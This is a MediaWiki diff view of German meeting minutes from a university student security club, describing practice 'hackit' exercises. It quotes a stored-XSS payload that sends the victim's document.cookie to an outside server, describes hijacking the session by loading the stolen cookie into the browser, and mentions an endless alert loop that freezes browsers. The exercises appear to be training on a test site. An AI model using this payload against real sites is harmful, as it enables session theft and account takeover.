Bearbeiten von „CInsects/Protokolle/CInsects:Treffen-2011-01-11

Zur Navigation springen Zur Suche springen

Warnung: Du bist nicht angemeldet. Deine IP-Adresse wird bei Bearbeitungen öffentlich sichtbar. Melde dich an oder erstelle ein Benutzerkonto, damit Bearbeitungen deinem Benutzernamen zugeordnet werden.

Die Bearbeitung kann rückgängig gemacht werden. Bitte prüfe den Vergleich unten, um sicherzustellen, dass du dies tun möchtest, und veröffentliche dann unten deine Änderungen, um die Bearbeitung rückgängig zu machen.

Aktuelle Version Dein Text
Zeile 9: Zeile 9:
was dazu führt, das auf der ausgebenden Seite eine Meldung mit eingegebenen Text erschien. Kaputmachen konnte man hier also noch nichts, es sei denn den eigenen Rechner.
was dazu führt, das auf der ausgebenden Seite eine Meldung mit eingegebenen Text erschien. Kaputmachen konnte man hier also noch nichts, es sei denn den eigenen Rechner.


Das zweite Hackit war ein wenig interessanter. Hier bestand die Möglichkeit sich mit Name und Kennwort anzumelden und dann über ein Nachrichten System Meldungen an andere Mitglieder zu senden. Diese Meldungen konnten natürlich JavaScript beinhalten, sodass wir damit anfangen konnten die Cookies (KEEEKSE!!! omnomnom) anderer Nutzer zu klauen.
Das zweite Hackit war ein wenig interessanter. Hier bestand die Möglichkeit sich mit Name und Kennwort anzumelden und dann über ein Nachrichten System Meldungen an andere Mitlgieder zu senden. Diese Meldungen konnten natürlich JavaScript beinhalten, sodass wir damit anfangen konnten die Cookies (KEEEKSE!!! omnomnom) anderer Nutzer zu klauen.
   <nowiki><script>document.write('<img src="http://cinsects.de/cookie?' +document.cookie+'">');</script></nowiki>
   <nowiki><script>document.write('<img src="http://cinsects.de/cookie?' +document.cookie+'">');</script></nowiki>
Mit diesem Script konnten wir den Cookie desjenigen auslesen, der die Nachricht bekommen hat und haben diesen in eine nicht existierende Datei auf einem Server für den wir Rechte haben geschickt. In der Fehlerkonsole dieses Servers wurde der Cookie nun angezeigt, und musste von uns nur noch als eigener Cookie in FF eingelesen werden.  
Mit diesem Script konnten wir den Cookie desjenigen auslesen, der die Nachricht bekommen hat und haben diesen in eine nicht existierende Datei auf einem Server für den wir Rechte haben geschickt. In der Fehlerkonsole dieses Servers wurde der Coockie nun angezeigt, und musste von uns nur noch als eigener Cookie in FF eingelesen werden.  


Natürlich war auch viel nasty shit möglich, wie aufpoppende Meldungen in einer while Schleife mit 1=1 als Bedingung, sodass der Brwoser neu gestartet werden musste.
Natürlich war auch viel nasty shit möglich, wie aufpoppende Meldungen in einer while Schleife mit 1=1 als Bedingung, sodass der Brwoser neu gestartet werden musste.  
 
Hackits [http://mercarion-online.de/test/CInsects/] Achtung! bitte keine Scripts verwenden, die Brwoser andere Nutzer unbrauchbar machen (s.o. unter nasty shit). Wenn eine solcher Hack drinn ist, könnt ihr (0rokita) bescheidsagen, er löscht die dann.


== Statistik ==
== Statistik ==
Zeile 22: Zeile 20:


L33tness-Faktor der Kekse: 100%
L33tness-Faktor der Kekse: 100%


== Themen für das nächste mal ==
== Themen für das nächste mal ==


FIXME und daran zu denken, jemanden zu bestimmen, der Kekse mitbringt.
FIXME
und daran zu denken, jemanden zu bestimmen, der Kekse mitbringt.

Bitte beachte, dass alle Beiträge zu Fachschaft_Informatik von anderen Mitwirkenden bearbeitet, geändert oder gelöscht werden können. Reiche hier keine Texte ein, falls du nicht willst, dass diese ohne Einschränkung geändert werden können.

Du bestätigst hiermit auch, dass du diese Texte selbst geschrieben hast oder diese von einer gemeinfreien Quelle kopiert hast (weitere Einzelheiten unter Fachschaft Informatik:Urheberrechte). ÜBERTRAGE OHNE GENEHMIGUNG KEINE URHEBERRECHTLICH GESCHÜTZTEN INHALTE!

Bitte beantworte die folgende Frage, um diese Seite bearbeiten zu können (<a href="/Fachschaft/wiki/index.php?title=Special:Captcha/help" class="internal">weitere Informationen</a>):

Abbrechen Bearbeitungshilfe (wird in einem neuen Fenster geöffnet)
Abgerufen von „https://www2.informatik.uni-hamburg.de/fachschaft/wiki/index.php/CInsects/Protokolle/CInsects:Treffen-2011-01-11